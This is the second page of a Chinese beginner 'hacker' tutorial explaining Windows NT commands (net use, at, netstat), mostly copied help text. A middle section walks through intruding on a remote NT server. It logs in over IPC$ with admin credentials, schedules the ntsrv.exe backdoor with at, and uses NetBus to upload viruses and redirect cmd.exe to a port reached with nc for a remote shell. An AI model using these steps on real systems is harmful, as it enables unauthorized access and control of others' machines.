初级黑客安全技术命令详解

　　b.net use

　　这个命令的语法是:NET USE [devicename | *] [\\computername\sharename[\volume] [password | *]]
[/USER:[domainname\]username]
[[/DELETE] | [/PERSISTENT:{YES | NO}]]

NET USE [devicename | *] [password | *]] [/HOME]

NET USE [/PERSISTENT:{YES | NO}]

　　NET USE 用于将计算机与共享的资源相连接，或者切断计算机与共享资源的连接。当不带选项使用本命令时，它会列出计算机的连接。

　　devicename 指定一个名字以便与资源相连接，或者指定要切断的设备。有两种类型的设备名：磁盘驱动器 (D: 至 Z:) 和打印机 (LPT1: 至 LPT3:)。输入一个星号来代替一个指定的设备名可以分配下一个可用设备名。

　　\\computername 指控制共享资源的计算机的名字。如果计算机名中包含有空字符，就要将双反斜线 (\\) 和计算机名一起用引号 (" ")括起来。计算机名可以有1 到15 个 字符。

　　\sharename 指共享资源的网络名字。

　　\volume 指定一个服务器上的 NetWare 卷。用户必须安装 Netware 的客户服务(Windows NT 工作站) 或者 Netware 的网关服务 (Windows NT 服务器) 并使之与NetWare 服务器相连。

　　password 指访问共享资源所需要的密码。

　　* 进行密码提示。当在密码提示符下输入密码时，密码是不会显示的。

　　/USER 指定连接时的一个不同的用户名。

　　domainname 指定另外一个域。如果缺省域，就会使用当前登录的域。

　　username 指定登录的用户名。

　　/HOME 将用户与他们的宿主目录相连。

　　/DELETE 取消一个网络连接，并且从永久连接列表中删除该连接。

　　/PERSISTENT 控制对永久网络连接的使用。其缺省值是最近使用的设置。

　　YES 在连接产生时保存它们，并在下次登录时恢复它们。

　　NO 不保存正在产生的连接或后续的连接；现有的连接将在下次登录时被恢复。可以使用 /DELETE 选项开关来删除永久连接。

　PS:前两天在绿色兵团的贴子里见到一位仁兄的话，与这个命令有异曲共工之妙，也说明一个大概：

　　在浏览器中输入 file:///\\***.***.**.***\c$

　　则网上共享的C盘内容就会显示出来了，就仿佛用浏览器上FTP站点看到的一样。各位不妨试试，还可试试举一反三……

　　5.at： 排定在特定的日期和时间运行某些命令和程序。

　　运行 AT 命令之前必须先启动 Schedule 服务。瞧，现炒就得现卖，刚学了net命令，但这个start命令我可没详述，自已看看帮助文件，摸索一下各种命令的用法吧。

　　C:\>net start schedule
　　 Schedule 正在启动服务.....
　　 Schedulw 服务启动成功。

　　AT [\\computername] [ [id] [/DELETE] | /DELETE [/YES]]
　　 AT [\\computername] time [/INTERACTIVE]
　　 [ /EVERY:date[,...] | /NEXT:date[,...]] "command"

　　\\computername 指定远程计算机。如果省略这个参数命令会被排定在本机上运行。

　　id 指定给排定进度命令的识别号。

　　/delete 删除某个已排定进度的命令。如果省略标识，计算机上所有已排定进度的命令都会被删除。

　　/yes 用于删除所有作业，且不想在运行删除时显示确认信息 。

　　time 指定命令运行的时间。
　　 interactive 允许作业在运行时，与用户通过桌面交互。

　　/every:date[,...] 指定在每周或每月的某日 (或某几日) 运行命令。
　　 如果省略日期，则默认为在每月的本日运行。

　　/next:date[,...] 指定在下一个指定日期 (如，下周三)，运行命令。
　　 如果省略日期，则默认为在每月的本日运行。

　　"command" 准备运行的 Windows NT 命令或批处理文件。

　　知道了如何使用AT，再来看看如何在远程NT上运行ntsrv.exe：

　　1 利用管理员登陆到目的服务器，方法为： net use \\x.x.x.x\ipc$ "adminpwd" /user:"adminuser"
　　 2 利用ntsrv.exe启动远程: netsvc \\x.x.x.x schedule /start
　　 3 利用AT.EXE在远程服务器设置程序定时运行，当然最快运行最理想，所以，你可以用letmein.exe得到服务器的时间，然后：

　　at \\x.x.x.x 00:00 ntsrv.exe /port:64321

　　其中00:00要改为用letmein.exe得回来的具体时间+一点容量，等一会后，再在本地启动netbus.exe，键入目的服务器得ip地址或hostname，连接！比如第一种方法，你想要在目的服务器运行诸如病毒之类的东东，可以利用netbus得上传功能，将各种“大补丸”上传至目的服务器，再用netbus的"Start program"，键入完整路径，就ok了！第二种方法是利用netbus的“App redirect”功能，启动远程telnet服务，如下：在netbus中击“App redirect”，键入"C:\>winnt\system32\cmd.exe"，Port为：4321，服务就启动了，然后在本地运行：nc x.x.x.x 4321，出现dos启动的画面就表示连接成功：

Microsoft(R) Windows NT(TM)
(C) Copyright 1985-1996 Microsoft Corp.
C:\>

注：这里有一小段是抄KILLUSA的文章——别找我要稿费啊^&^

　　4.netstat 这是一个观察网络连接状态的实用工具。

　　它能检验IP的当前连接状态，在断定你的基本级通信正在进行后，就要验证系统上的服务。这个服务包括检查正在收听输入的通信量和/或验证你正在创建一个与远程站点的会话，它可以很轻松地做到这一点。网上也可以看到很多如X-netstat之类的工具，是WIN界面的，更加直观而已，并没有多什么功能，这个命令的具体用法如下：

Displays protocol statistics and current TCP/IP network connections.（显示协议与当前网络连接）

NETSTAT [-a] [-e] [-n] [-s] [-p proto] [-r] [interval]

-a Displays all connections and listening ports.（显示所有连接和监听端口）
-e Displays Ethernet statistics. This may be combined with the -s
option.（显示以太连接，可以与-s连用）
-n Displays addresses and port numbers in numerical form.（显示地址和端口）
-p proto Shows connections for the protocol specified by proto; proto
may be TCP or UDP. If used with the -s option to display
per-protocol statistics, proto may be TCP, UDP, or IP.
-r Displays the routing table.
-s Displays per-protocol statistics. By default, statistics are
shown for TCP, UDP and IP; the -p option may be used to specify
a subset of the default.
interval Redisplays selected statistics, pausing interval seconds
between each display. Press CTRL+C to stop redisplaying
statistics. If omitted, netstat will print the current
configuration information once.（interval是设定一个刷新时间，在间隔时间内暂停，按CTRL+C停止……）

　　这是我在本机未连接网络时运行的，第一列为协议，第二列为本地地址，第三列是与你进行连接的主机或用户的IP位址（IP后冒号之后的数字是端口号），最后一列是状态。这个命令以-n和-a的参数我较常使用，读者可以参考使用。

上一页  [1] [2]